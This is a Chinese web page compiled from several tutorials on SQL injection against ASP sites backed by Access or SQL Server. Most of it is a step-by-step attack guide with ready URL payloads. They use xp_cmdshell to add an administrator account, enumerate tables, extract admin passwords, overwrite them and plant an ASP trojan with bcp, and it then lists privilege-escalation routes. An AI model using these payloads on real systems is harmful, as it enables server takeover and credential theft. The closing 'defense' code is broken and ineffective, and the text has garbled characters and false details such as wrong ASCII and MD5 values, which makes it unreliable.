sql注入分級管理

Ⅰ 關於sql注入

<二>SQL注入思路

思路最重要。其實好多人都不知道SQL到底能做什麼呢？這里總結一下SQL注入入侵的總體的思路：

1. SQL注入漏洞的判斷，即尋找注入點

2. 判斷後台資料庫類型

3. 確定XP_CMDSHELL可執行情況；若當前連接數據的帳號具有SA許可權，且master.dbo.xp_cmdshell擴展存儲過程(調用此存儲過程可以直接使用操作系統的shell)能夠正確執行，則整個計算機可以通過幾種方法完全控制，也就完成了整個注入過程，否則繼續：

1. 發現WEB虛擬目錄

2. 上傳ASP木馬；

3. 得到管理員許可權

具體步驟：

一、SQL注入漏洞的判斷

如果以前沒玩過注入，請把IE菜單-工具-Internet選項－高級－顯示友好HTTP錯誤信息前面的勾去掉。

為了把問題說明清楚，以下以http://www.163.com/news.asp?id=xx(這個地址是假想的)，為例進行分析，xx可能是整型，也有可能是字元串。

1、整型參數的判斷

當輸入的參數xx為整型時，通常news.asp中SQL語句原貌大致如下：

select * from 表名 where 欄位=xx，所以可以用以下步驟測試SQL注入是否存在。

最簡單的判斷方法

http://www.163.com/news.asp?id=xx』(附加一個單引號)，

此時news.asp中的SQL語句變成了

select * from 表名 where 欄位=xx』，

如果程序沒有過濾好「』」的話，就會提示 news.asp運行異常；但這樣的方法雖然很簡單，但並不是最好的，因為：

first,不一定每台伺服器的IIS都返回具體錯誤提示給客戶端，如果程序中加了cint(參數)之類語句的話，SQL注入是不會成功的，但伺服器同樣會報錯，具體提示信息為處理 URL 時伺服器上出錯。請和系統管理員聯絡。

second，目前大多數程序員已經將「』「 過濾掉，所以用」 』」測試不到注入點，所以一般使用經典的1=1和1=2測試方法，見下文：

http://www.163.com/news.asp?id=xx and 1=1, news.asp運行正常，

而且與http://www.163.com/news.asp?id=xx運行結果相同；

http://www.163.com/news.asp?id=xx and 1=2, news.asp運行異常；（這就是經典的 1=1 1=2 判斷方法）

如果以上面滿足，news.asp中就會存在SQL注入漏洞，反之則可能不能注入。

2、字元串型參數的判斷

方法與數值型參數判斷方法基本相同

當輸入的參數xx為字元串時，通常news.asp中SQL語句原貌大致如下：

select * from 表名 where 欄位='xx'，所以可以用以下步驟測試SQL注入是否存在。

http://www.163.com/news.asp?id=xx』(附加一個單引號)，此時news.asp中的SQL語句變成了
select * from 表名 where 欄位=xx』，news.asp運行異常；
http://www.163.com/news.asp?id=xx and '1'='1', news.asp運行正常，

而且與http://www.163.com/news.asp?id=xx運行結果相同；

http://www.163.com/news.asp?id=xx and '1'='2', news.asp運行異常；

如果以上滿足，則news.asp存在SQL注入漏洞，反之則不能注入

3、特殊情況的處理

有時ASP程序員會在程序員過濾掉單引號等字元，以防止SQL注入。此時可以用以下幾種方法試一試。

①大小定混合法：由於VBS並不區分大小寫，而程序員在過濾時通常要麼全部過濾大寫字元串，要麼全部過濾小寫字元串，而大小寫混合往往會被忽視。如用SelecT代替select,SELECT等；

②UNICODE法：在IIS中，以UNICODE字元集實現國際化，我們完全可以IE中輸入的字元串化成UNICODE字元串進行輸入。如+ =%2B，空格=%20 等；URLEncode信息參見附件一；

③ASCII碼法：可以把輸入的部分或全部字元全部

<4>出了上述方法以外，還有個更簡單的方法就是使用現成的工具像NB聯盟的NBSI就是一款很不錯的工具，目前最新的版本為2.2

二、判斷資料庫類型

不同的資料庫的函數、注入方法都是有差異的，所以在注入之前，我們還要判斷一下資料庫的類型。一般ASP最常搭配的資料庫是Access和SQLServer，網上超過99%的網站都是其中之一。

怎麼讓程序告訴你它使用的什麼資料庫呢？來看看：

SQLServer有一些系統變數，如果伺服器IIS提示沒關閉，並且SQLServer返回錯誤提示的話，那可以直接從出錯信息獲取，方法如下：
http://www.163.com/news.asp?id=xx;and user>0

這句語句很簡單，但卻包含了SQLServer特有注入方法的精髓，我自己也是在一次無意的測試中發現這種效率極高的猜解方法。讓我看來看看它的含義：首先，前面的語句是正常的，重點在and user>0，我們知道，user是SQLServer的一個內置變數，它的值是當前連接的用戶名，類型為nvarchar。拿一個 nvarchar的值跟int的數0比較，系統會先試圖將nvarchar的值轉成int型，當然，轉的過程中肯定會出錯，SQLServer的出錯提示是：將nvarchar值 」abc」 轉換數據類型為 int 的列時發生語法錯誤，呵呵，abc正是變數user的值，這樣，不廢吹灰之力就拿到了資料庫的用戶名。在以後的篇幅里，大家會看到很多用這種方法的語句。 順便說幾句，眾所周知，SQLServer的用戶sa是個等同Adminstrators許可權的角色，拿到了sa許可權，幾乎肯定可以拿到主機的 Administrator了。上面的方法可以很方便的測試出是否是用sa登錄，要注意的是：如果是sa登錄，提示是將」dbo」轉換成int的列發生錯誤，而不是」sa」。

如果伺服器IIS不允許返回錯誤提示，那怎麼判斷資料庫類型呢？我們可以從Access和SQLServer和區別入手，Access和 SQLServer都有自己的系統表，比如存放資料庫中所有對象的表，Access是在系統表[msysobjects]中，但在Web環境下讀該表會提示「沒有許可權」，SQLServer是在表[sysobjects]中，在Web環境下可正常讀取。

在確認可以注入的情況下，使用下面的語句：

http://www.163.com/news.asp?id=xx ;and (select count(*) from sysobjects)>0
http://www.163.com/news.asp?id=xx ;and (select count(*) from msysobjects)>0

如果資料庫是SQLServer，那麼第一個網址的頁面與原頁面http://www.163.com/news.asp?id=xx是大致相同的；而第二個網址，由於找不到表msysobjects，會提示出錯，就算程序有容錯處理，頁面也與原頁面完全不同。

如果資料庫用的是Access，那麼情況就有所不同，第一個網址的頁面與原頁面完全不同；第二個網址，則視乎資料庫設置是否允許讀該系統表，一般來說是不允許的，所以與原網址也是完全不同。大多數情況下，用第一個網址就可以得知系統所用的資料庫類型，第二個網址只作為開啟IIS錯誤提示時的驗證。

三、確定XP_CMDSHELL可執行情況

若當前連接數據的帳號具有SA許可權，且master.dbo.xp_cmdshell擴展存儲過程(調用此存儲過程可以直接使用操作系統的shell)能夠正確執行，則整個計算機可以通過以下幾種方法完全控制，以後的所有步驟都可以省

1、http://www.163.com/news.asp?id=xx and user>;0 news.asp執行異常但可以得到當前連接資料庫的用戶名(若顯示dbo則代表SA)。

2、http://www.163.com/news.asp?id=xx and db_name()>0 news.asp執行異常但可以得到當前連接的資料庫名。

3、http://www.163.com/news.asp?id=xx；exec master..xp_cmdshell 「net user aaa bbb /add」-- (master是SQL-SERVER的主數據
庫；名中的分號表示SQL-SERVER執行完分號前的語句名，繼續執行其後面的語句；「—」號是註解，表示其後面的所有內容僅為注釋，系統並不執行)可以直接增加操作系統帳戶aaa,密碼為bbb。

4、http://www.163.com/news.asp?id=xx；exec master..xp_cmdshell 「net localgroup administrators aaa /add」-- 把剛剛增加
的帳戶aaa加到administrators組中。

5、http://www.163.com/news.asp?id=xx；backuup database 資料庫名 to disk='c:\inetpub\wwwroot\save.db' 則把得到的數據內容
全部備份到WEB目錄下，再用HTTP把此文件下載(當然首選要知道WEB虛擬目錄)。

6、通過復制CMD創建UNICODE漏洞

http://www.163.com/news.asp?id=xx;exec master.dbo.xp_cmdshell 「 c:\winnt\system32\cmd.exe

c:\inetpub\scripts\cmd.exe」 便製造了一個UNICODE漏洞，通過此漏洞的利用方法，便完成了對整個計算機的控制(當然首選要知道WEB虛擬目錄)。

這樣你就成功的完成了一次SQL注入攻擊，先別興奮，在實踐時你就會發現這比理論要難的多會有更多的困難等著你come over ，下面GO ON如果上述條件不成立則需繼續奮斗（要掛馬了：））

GO ON~!

當上述條件不成立時就要繼續下面的步驟

(一)、發現WEB虛擬目錄

只有找到WEB虛擬目錄，才能確定放置ASP木馬的位置，進而得到USER許可權。有兩種方法比較有效。

一是根據經驗猜解，一般來說，WEB虛擬目錄是：c:\inetpub\wwwroot;

D:\inetpub\wwwroot; E:\inetpub\wwwroot等，而可執行虛擬目錄是：
c:\inetpub\scripts; D:\inetpub\scripts; E:\inetpub\scripts等。

二是遍歷系統的目錄結構，分析結果並發現WEB虛擬目錄；

先創建一個臨時表：temp

http://www.163.com/news.asp?id=xx;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3
nvarchar(255));--

接下來：

1 我們可以利用xp_availablemedia來獲得當前所有驅動器,並存入temp表中：

http://www.163.com/news.asp?id=xx;insert temp exec master.dbo.xp_availablemedia;--

我們可以通過查詢temp的內容來獲得驅動器列表及相關信息

2 我們可以利用xp_subdirs獲得子目錄列表,並存入temp表中：

http://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--

3 我們還可以利用xp_dirtree獲得所有子目錄的目錄樹結構,並寸入temp表中：

http://www.163.com/news.asp?id=xx;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--

這樣就可以成功的瀏覽到所有的目錄（文件夾）列表：

如果我們需要查看某個文件的內容，可以通過執行xp_cmdsell：

http://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--

使用'bulk insert'語法可以將一個文本文件插入到一個臨時表中。如：bulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp'
瀏覽temp就可以看到index.asp文件的內容了！通過分析各種ASP文件，可以得到大量系統信息，WEB建設與管理信息，甚至可以得到SA帳號的連接密碼。

當然，如果xp_cmshell能夠執行，我們可以用它來完成：

http://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';--
http://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\ *.asp /s/a';--

通過xp_cmdshell我們可以看到所有想看到的，包括W3svc

http://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'cscript
C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc'

但是，如果不是SA許可權，我們還可以使用

http://www.163.com/news.asp?id=xx;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--

注意：

1、以上每完成一項瀏覽後，應刪除TEMP中的所有內容，刪除方法是：

http://www.163.com/news.asp?id=xx;delete from temp;--

2、瀏覽TEMP表的方法是：(假設TestDB是當前連接的資料庫名)
http://www.163.com/news.asp?id=xx and (select top 1 id from TestDB.dbo.temp )>0

得到表TEMP中第一條記錄id欄位的值，並與整數進行比較，顯然news.asp工作異常，但在異常中卻可以發現id欄位的值。假設發現的表名是xyz，則

http://www.163.com/news.asp?id=xx and (select top 1 id from TestDB.dbo.temp )>0 where id not in('xyz'))>0

得到表TEMP中第二條記錄id欄位的值。

(二)、上傳ASP木馬

所謂ASP木馬，就是一段有特殊功能的ASP代碼，並放入WEB虛擬目錄的Scripts下，遠程客戶通過IE就可執行它，進而得到系統的USER許可權，實現對系統的初步控制。上傳ASP木馬一般有兩種比較有效的方法：

1、利用WEB的遠程管理功能

許多WEB站點，為了維護的方便，都提供了遠程管理的功能；也有不少WEB站點，其內容是對於不同的用戶有不同的訪問許可權。為了達到對用戶許可權的控制，都有一個網頁，要求用戶名與密碼，只有輸入了正確的值，才能進行下一步的操作,可以實現對WEB的管理，如上傳、下載文件，目錄瀏覽、修改配置等。

因此，若獲取正確的用戶名與密碼，不僅可以上傳ASP木馬，有時甚至能夠直接得到USER許可權而瀏覽系統，上一步的「發現WEB虛擬目錄」的復雜操作都可省略。

用戶名及密碼一般存放在一張表中，發現這張表並讀取其中內容便解決了問題。以下給出兩種有效方法。

A、 注入法：

從理論上說，認證網頁中會有型如：

select * from admin where username='XXX' and password='YYY' 的語句，若在正式運行此句之前，沒有進行必要的字元過濾，則很容易實施SQL注入。

如在用戶名文本框內輸入：abc』 or 1=1-- 在密碼框內輸入：123 則SQL語句變成：

select * from admin where username='abc』 or 1=1 and password='123』

不管用戶輸入任何用戶名與密碼，此語句永遠都能正確執行，用戶輕易騙過系統，獲取合法身份。

B、猜解法：

基本思路是：猜解所有資料庫名稱，猜出庫中的每張表名，分析可能是存放用戶名與密碼的表名，猜出表中的每個欄位名，猜出表中的每條記錄內容。

a 猜解所有資料庫名稱

http://www.163.com/news.asp?id=xx and (select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) <>0

因為dbid的值從1到5，是系統用了。所以用戶自己建的一定是從6開始的。並且我們提交了 name>1 (name欄位是一個字元型的欄位和數字比較會出錯),news.asp工作異常，可得到第一個資料庫名，同理把DBID分別改成7,8，9,10,11,12…就可得到所有資料庫名。

以下假設得到的資料庫名是TestDB。

b 猜解資料庫中用戶名表的名稱

猜解法：此方法就是根據個人的經驗猜表名，一般來說，

user,users,member,members,userlist,memberlist,userinfo,manager,admin,adminuser,systemuser,
systemusers,sysuser,sysusers,sysaccounts,systemaccounts等。並通過語句進行判斷

http://www.163.com/news.asp?id=xx and (select count(*) from TestDB.dbo.表名)>0 若表名存在，則news.asp工作正常，否則異常。如此循環，直到猜到系統帳號表的名稱。

讀取法：SQL-SERVER有一個存放系統核心信息的表sysobjects，有關一個庫的所有表，視圖等信息全部存放在此表中，而且此表可以通過WEB進行訪問。

當xtype='U' and status>0代表是用戶建立的表，發現並分析每一個用戶建立的表及名稱，便可以得到用戶名表的名稱，基本的實現方法是：

①http://www.163.com/news.asp?id=xx and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0 )>0
得到第一個用戶建立表的名稱，並與整數進行比較，顯然news.asp工作異常，但在異常中卻可以發現表的名稱。假設發現的表名是xyz，則

②http://www.163.com/news.asp?id=xx and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0 and
name not in('xyz'))>0 可以得到第二個用戶建立的表的名稱，同理就可得到所有用建立的表的名稱。

根據表的名稱，一般可以認定那張表用戶存放用戶名及密碼，以下假設此表名為Admin。

c 猜解用戶名欄位及密碼欄位名稱

admin表中一定有一個用戶名欄位，也一定有一個密碼欄位，只有得到此兩個欄位的名稱，才有可能得到此兩欄位的內容。如何得到它們的名稱呢，同樣有以下兩種方法。

猜解法：此方法就是根據個人的經驗猜欄位名，一般來說，用戶名欄位的名稱常用：username,name,user,account等。而密碼欄位的名稱常用：password,pass,pwd,passwd等。並通過語句進行判斷

http://www.163.com/news.asp?id=xx and (select count(欄位名) from TestDB.dbo.admin)>0 「select count(欄位名) from 表名」

語句得到表的行數，所以若欄位名存在，則news.asp工作正常，否則異常。如此循環，直到猜到兩個欄位的名稱。

讀取法：基本的實現方法是

http://www.163.com/news.asp?id=xx and (select top 1 col_name(object_id('admin'),1) from TestDB.dbo.sysobjects)>0 。
select top 1 col_name(object_id('admin'),1) from TestDB.dbo.sysobjects是從sysobjects得到已知表名的第一個欄位名，當與整數進行比較，顯然news.asp工作異常，但在異常中卻可以發現欄位的名稱。把col_name(object_id('admin'),1)中的1依次換成2,3,4,5，6…就可得到所有的欄位名稱。

d 猜解用戶名與密碼

猜用戶名與密碼的內容最常用也是最有效的方法有：

ASCII碼逐字解碼法:雖然這種方法速度較慢，但肯定是可行的。基本的思路是先猜出欄位的長度，然後依次猜出每一位的值。猜用戶名與猜密碼的方法相同，以下以猜用戶名為例說明其過程。

http://www.163.com/news.asp?id=xx and (select top 1 len(username) from TestDB.dbo.admin)=X(X=1,2，3,4，5，… n，username

為用戶名欄位的名稱，admin為表的名稱)，若x為某一值i且news.asp運行正常時，則i就是第一個用戶名的長度。如：當輸入
http://www.163.com/news.asp?id=xx and (select top 1 len(username) from TestDB.dbo.admin)=8時news.asp運行正常，則第一個用戶名的長度為8

http://www.163.com/news.asp?id=xx and (select top 1 ascii(substring(username,m,1)) from TestDB.dbo.admin)=n (m的值在1到上一步得到的用戶名長度之間，當m=1，2,3，…時猜測分別猜測第1,2,3,…位的值；n的值是1~9、a~z、A~Z的ASCII值，也就是1~128之間的任意值；admin為系統用戶帳號表的名稱)，若n為某一值i且news.asp運行正常時，則i對應ASCII碼就是用戶名某一位值。如：當輸入
http://www.163.com/news.asp?id=xx and (select top 1 ascii(substring(username,3,1)) from TestDB.dbo.admin)=80時news.asp運行正常，則用戶名的第三位為P(P的ASCII為80)；http://www.163.com/news.asp?id=xx and (select top 1 ascii(substring(username,9,1)) from TestDB.dbo.admin)=33時news.asp運行正常，則用戶名的第9位為!(!的ASCII為80)；猜到第一個用戶名及密碼後，同理，可以猜出其他所有用戶名與密碼。注意：有時得到的密碼可能是經MD5等方式加密後的信息，還需要用專用工具進行脫密。或者先改其密碼，使用完後再改回來，見下面說明。簡單法：猜用戶名用http://www.163.com/news.asp?id=xx and (select top 1 flag from TestDB.dbo.admin where username>1) , flag是admin表中的一個欄位，username是用戶名欄位，此時news.asp工作異常，但能得到Username的值。與上同樣的方法，可以得到第二用戶名，第三個用戶等等，直到表中的所有用戶名。

猜用戶密碼：http://www.163.com/news.asp?id=xx and (select top 1 flag from TestDB.dbo.admin where pwd>1) , flag是admin表中的一個欄位，pwd是密碼欄位，此時news.asp工作異常，但能得到pwd的值。與上同樣的方法，可以得到第二用戶名的密碼，第三個用戶的密碼等等，直到表中的所有用戶的密碼。密碼有時是經MD5加密的，可以改密碼。

http://www.163.com/news.asp?id=xx;update TestDB.dbo.admin set pwd=' a0b923820dcc509a' where username='www';-- ( 1的MD5值為：AAABBBCCCDDDEEEF，即把密碼改成1；www為已知的用戶名)用同樣的方法當然可把密碼改原來的值。

2、利用表內容導成文件功能

SQL有BCP命令，它可以把表的內容導成文本文件並放到指定位置。利用這項功能，我們可以先建一張臨時表，然後在表中一行一行地輸入一個ASP木馬，然後用BCP命令導出形成ASP文件。

命令行格式如下：

bcp "select * from text..foo" queryout c:\inetpub\wwwroot\163.asp –c –S localhost –U sa –P foobar
('S'參數為執行查詢的伺服器，'U'參數為用戶名，'P'參數為密碼，最終上傳了一個163.asp的木馬)

3、利用工具，如NBSI給出的一些參考數據最重要的表名：

select * from sysobjects
sysobjects ncsysobjects
sysindexes tsysindexes
syscolumns
systypes
sysusers
sysdatabases
sysxlogins
sysprocesses

最重要的一些用戶名（默認sql資料庫中存在著的）

public
dbo
guest(一般禁止，或者沒許可權)
db_sercurityadmin
ab_dlladmin
一些默認擴展
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
xp_availablemedia 驅動器相關
xp_dirtree 目錄
xp_enumdsn ODBC連接
xp_loginconfig 伺服器安全模式信息
xp_makecab 創建壓縮卷
xp_ntsec_enumdomains domain信息
xp_terminate_process 終端進程，給出一個PID

(三)、得到系統的管理員許可權

ASP木馬只有USER許可權，要想獲取對系統的完全控制，還要有系統的管理員許可權。怎麼辦？提升許可權的方法有很多種：

上傳木馬，修改開機自動運行的.ini文件(它一重啟，便死定了)；

復制CMD.exe到scripts，人為製造UNICODE漏洞；

下載SAM文件，破解並獲取OS的所有用戶名密碼；

等等，視系統的具體情況而定，可以採取不同的方法。

那麼我們怎麼防注入呢？程序如下加入到asp或html或php或cgi裡面都可以。經過測試。加入如 top.asp文件中開頭

方法一：

<%if session("username"="" or session("userkey"="" then
response.redirect "../../"
end if%>

(說明：只要有用戶注入則跳轉到../../目錄，呵呵，看你怎麼給我注入)

方法二：

<%
server_v1=Cstr(Request.ServerVariables("HTTP_REFERER")
server_v2=Cstr(Request.ServerVariables("SERVER_NAME")
if mid(server_v1,8,len(server_v2))<>server_v2 then
response.write "<br><br><center><table border=1 cellpadding=20 bordercolor=black bgcolor=#EEEEEE width=450>"
response.write "<tr><td style=「font:9pt Verdana">"
response.write "你提交的路徑有誤，禁止從站點外部提交數據請不要亂該參數！"
response.write "</td></tr></table></center>"
response.end
end if
%>

(說明：只要有用戶注入則判斷為外部連接哦，呵呵，看你怎麼給我注入)

方法三：

<% dim From_url,Serv_url
From_url = Cstr(Request.ServerVariables("HTTP_REFERER")
Serv_url = Cstr(Request.ServerVariables("SERVER_NAME")
if mid(From_url,8,len(Serv_url)) <> Serv_url then
response.write "NO"
response.redirect("../"
response.end
end if%>

Ⅱ 什麼是SQL注入及SQL注入工具

分類: 電腦/網路 >>梁局 程序設計 >> 其他編程語言
解析:

隨著B/S模式應用開發的發展，使用這種模式編寫應用程序的程序員也越來越多。但是由於這個行業的入門門檻不高，程序員的水平及經驗也參差不齊，相當大一部分程序員在編寫代碼的時候，沒有對用戶輸入數據的合法性進行判斷，使應用程序存在安全隱患。用戶可以提交一段資料庫查詢代碼，根據程序返回的結果，獲得某些他想得知的數據，這就是所謂的SQL Injection，即SQL注入。

SQL注入是從正常的WWW埠訪問，而且表面看起來跟一般的Web頁面訪問沒什麼區別，所以目前市面的防火牆都不會對SQL注入發出警報，如果管理員沒查看IIS日誌的習慣，可能被入侵很長時間都不會發覺。

但是，SQL注入的手法相當靈活，在注入的時候會碰到很多意外的情況。能不能根據具體情況進行分析，構造巧妙的SQL語句，從而成功獲取想要的數據，是高手與「菜鳥」的根本區別。

根據國情，國內的網站用ASP+Access或SQLServer的佔70%以上，PHP+MySQ佔L20%，其他的不足10%。在本文，我們從分入門、進階至高級講解一下ASP注入的方法及技巧，PHP注入的文章由NB聯盟的另一位朋友zwell撰寫，希望對安全工作者和程序員都有用處。了解ASP注入的朋友也請不要跳過入門篇，因為部分人對注入的基本判斷方法還存在誤區。大家准備好了嗎？Let's Go...

入 門 篇

如果你以前沒試過SQL注入的話，那麼第一步先把IE菜單=>工具=>Inter選項=>高級=>顯示友好 HTTP 錯誤信息前面的勾去掉。否則，不論伺服器返回什麼錯誤，IE都只顯示為HTTP 500伺服器錯誤，不能獲得更多的提示信息。

第一節、SQL注入原理

以下我們從一個網站19開始（註：本文發表前已徵得該站站長同意，大部分都是真實數據）。

在網站首頁上，有名為「IE不能打開新窗口的多種解決方法」的鏈接，地址為：19/showdetail?id=49，我們在這個地址後面加上單引號』，伺服器會返回下面的錯誤提含渣碼示：

Microsoft JET Database Engine 錯誤 '80040e14'

字元串的語法錯誤 在查詢表達式 'ID=49'' 中。

/showdetail，行8

從這個錯誤提示我們能看出下面幾點：

1.網站使用的是Access資料庫，通過JET引擎連接資料庫，而不是通過ODBC。

2.程序沒有判斷客戶端提交的數據是否符合程序要求。

3.該SQL語句所查詢的表中有一名為ID的欄位。

從上面的例子我們可以知道，SQL注入的原理，就是從客戶端提交特殊的代碼，從而收集程序及伺服器的信息，從而獲取你想到得到的資料。

第二節、判斷能否進行SQL注入

看完第一節，有一些人會覺得：我也是經常這樣測試能否注入的，這不是很簡單嗎？

其實，這並不是最好的方法，為什麼呢？

首先，不一定每台伺服器的IIS都返回具體錯誤提示給客戶端，如果程序中加了cint(參數)之類語句的話，SQL注入是不會成功的，但伺服器同樣會報談哪錯，具體提示信息為處理 URL 時伺服器上出錯。請和系統管理員聯絡。

其次，部分對SQL注入有一點了解的程序員，認為只要把單引號過濾掉就安全了，這種情況不為少數，如果你用單引號測試，是測不到注入點的

那麼，什麼樣的測試方法才是比較准確呢？答案如下：

① 19/showdetail?id=49

② 19/showdetail?id=49 and 1=1

③ 19/showdetail?id=49 and 1=2

這就是經典的1=1、1=2測試法了，怎麼判斷呢？看看上面三個網址返回的結果就知道了：

可以注入的表現：

① 正常顯示（這是必然的，不然就是程序有錯誤了）

② 正常顯示，內容基本與①相同

③ 提示BOF或EOF（程序沒做任何判斷時）、或提示找不到記錄（判斷了rs.eof時）、或顯示內容為空（程序加了on error resume next）

不可以注入就比較容易判斷了，①同樣正常顯示，②和③一般都會有程序定義的錯誤提示，或提示類型轉換時出錯。

當然，這只是傳入參數是數字型的時候用的判斷方法，實際應用的時候會有字元型和搜索型參數，我將在中級篇的「SQL注入一般步驟」再做分析。

第三節、判斷資料庫類型及注入方法

不同的資料庫的函數、注入方法都是有差異的，所以在注入之前，我們還要判斷一下資料庫的類型。一般ASP最常搭配的資料庫是Access和SQLServer，網上超過99%的網站都是其中之一。

怎麼讓程序告訴你它使用的什麼資料庫呢？來看看：

SQLServer有一些系統變數，如果伺服器IIS提示沒關閉，並且SQLServer返回錯誤提示的話，那可以直接從出錯信息獲取，方法如下：
19/showdetail?id=49 and user>0

這句語句很簡單，但卻包含了SQLServer特有注入方法的精髓，我自己也是在一次無意的測試中發現這種效率極高的猜解方法。讓我看來看看它的含義：首先，前面的語句是正常的，重點在and user>0，我們知道，user是SQLServer的一個內置變數，它的值是當前連接的用戶名，類型為nvarchar。拿一個nvarchar的值跟int的數0比較，系統會先試圖將nvarchar的值轉成int型，當然，轉的過程中肯定會出錯，SQLServer的出錯提示是：將nvarchar值 」abc」 轉換數據類型為 int 的列時發生語法錯誤，呵呵，abc正是變數user的值，這樣，不廢吹灰之力就拿到了資料庫的用戶名。在以後的篇幅里，大家會看到很多用這種方法的語句。

順便說幾句，眾所周知，SQLServer的用戶sa是個等同Adminstrators許可權的角色，拿到了sa許可權，幾乎肯定可以拿到主機的Administrator了。上面的方法可以很方便的測試出是否是用sa登錄，要注意的是：如果是sa登錄，提示是將」dbo」轉換成int的列發生錯誤，而不是」sa」。

如果伺服器IIS不允許返回錯誤提示，那怎麼判斷資料庫類型呢？我們可以從Access和SQLServer和區別入手，Access和SQLServer都有自己的系統表，比如存放資料庫中所有對象的表，Access是在系統表[msysobjects]中，但在Web環境下讀該表會提示「沒有許可權」，SQLServer是在表[sysobjects]中，在Web環境下可正常讀取。

在確認可以注入的情況下，使用下面的語句：
19/showdetail?id=49 and (select count(*) from sysobjects)>0
19/showdetail?id=49 and (select count(*) from msysobjects)>0

如果資料庫是SQLServer，那麼第一個網址的頁面與原頁面19/showdetail?id=49是大致相同的；而第二個網址，由於找不到表msysobjects，會提示出錯，就算程序有容錯處理，頁面也與原頁面完全不同。

如果資料庫用的是Access，那麼情況就有所不同，第一個網址的頁面與原頁面完全不同；第二個網址，則視乎資料庫設置是否允許讀該系統表，一般來說是不允許的，所以與原網址也是完全不同。大多數情況下，用第一個網址就可以得知系統所用的資料庫類型，第二個網址只作為開啟IIS錯誤提示時的驗證

Ⅲ SQL注入一般步驟

ASP編程門檻很低，新手很容易上路。在一段不長的時間里，新手往往就已經能夠編出看來比較完美的動態網站，在功能上，老手能做到的，新手也能夠做到。那麼新手與老手就沒區別了嗎？這裡面區別可就大了，只不過外行人很難一眼就看出來罷了。在界面的友好性、運行性能以及網站的安全性方面是新手與老手之間區別的三個集中點。而在安全性方面，新手最容易忽略的問題就是SQL注入漏洞的問題。用NBSI 2.0對網上的一些ASP網站稍加掃描，就能發現許多ASP網站存在SQL注入漏洞，教育網里高校內部機構的一些網站這種漏洞就更普遍了，可能這是因為這些網站大都是一些學生做的緣故吧，雖然個個都很聰明，可是畢竟沒有經驗，而且處於學習中，難免漏洞多多了。本文主要講講SQL注入的防範措施，而要明白這些防範措施的用處，須先詳細講解利用SQL注入漏洞入侵的過程。新手們看明白啦。

相當大一部分程序員在編寫代碼的時候，沒有對用戶輸入數據的合法性進行判斷，使應用程序存在安全隱患。如這是一個正常的網址http://localhost/lawjia/show.asp?ID=444，將這個網址提交到伺服器後，伺服器將進行類似Select * from 表名 where 欄位="&ID的查詢(ID即客戶端提交的參數，本例是即444)，再將查詢結果返回給客戶端，如果這里客戶端故意提交這么一個網址：

http://localhost/lawjia/show.asp?ID=444 and user>0，這時，伺服器運行Select * from 表名 where 欄位=444 and user>0這樣的查詢，當然，這個語句是運行不下去的，肯定出錯，錯誤信息如下：

·錯誤類型：

Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]將 nvarchar 值 'sonybb' 轉換為數據類型為 int 的列時發生語法錯誤。
/lawjia/show.asp, 第 47 行

但是別有用心的人從這個出錯信息中，可以獲得以下信息：該站使用MS＿SQL資料庫，用ODBC連接，連接帳號名為：sonybb。所謂SQL注入（SQL Injection），就是利用程序員對用戶輸入數據的合法性檢測不嚴或不檢測的特點，故意從客戶端提交特殊的代碼，從而收集程序及伺服器的信息，從而獲取想得到的資料。通常別有用心者的目標是獲取網站管理員的帳號和密碼。比如當某個人知道網站管理員帳號存在表login中，管理員帳號名為admin，他想知道管理員密碼，這里他從客戶端接著提交這樣一個網址：
http://localhost/lawjia/show.asp?ID=444 and (Select password from login where user_name='admin')>0，返回的出錯信息如下：

·錯誤類型：

Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]將 varchar 值 '！＠＃＊＆admin' 轉換為數據類型為 int 的列時發生語法錯誤。
/lawjia/show.asp, 第 47 行

你知道嗎？上面標紅的部分就是管理員帳號admin的密碼！雖然很復雜，讓人看幾遍也記不住的，但它就這樣顯示在你面前了，這時您就可以用這個帳號和密碼接管人家的網站了！這時你可能還會說，如果他不是事先知道管理員帳號存在表login中，而且知道管理員帳號為admin，那他就不可能獲得管理員密碼。你錯了，只要人家願意多花時間嘗試，他將可以獲得資料庫連接帳號許可權內所能獲得的所有信息！具體過程請參看網上的這篇文章：SQL注入漏洞全接觸。

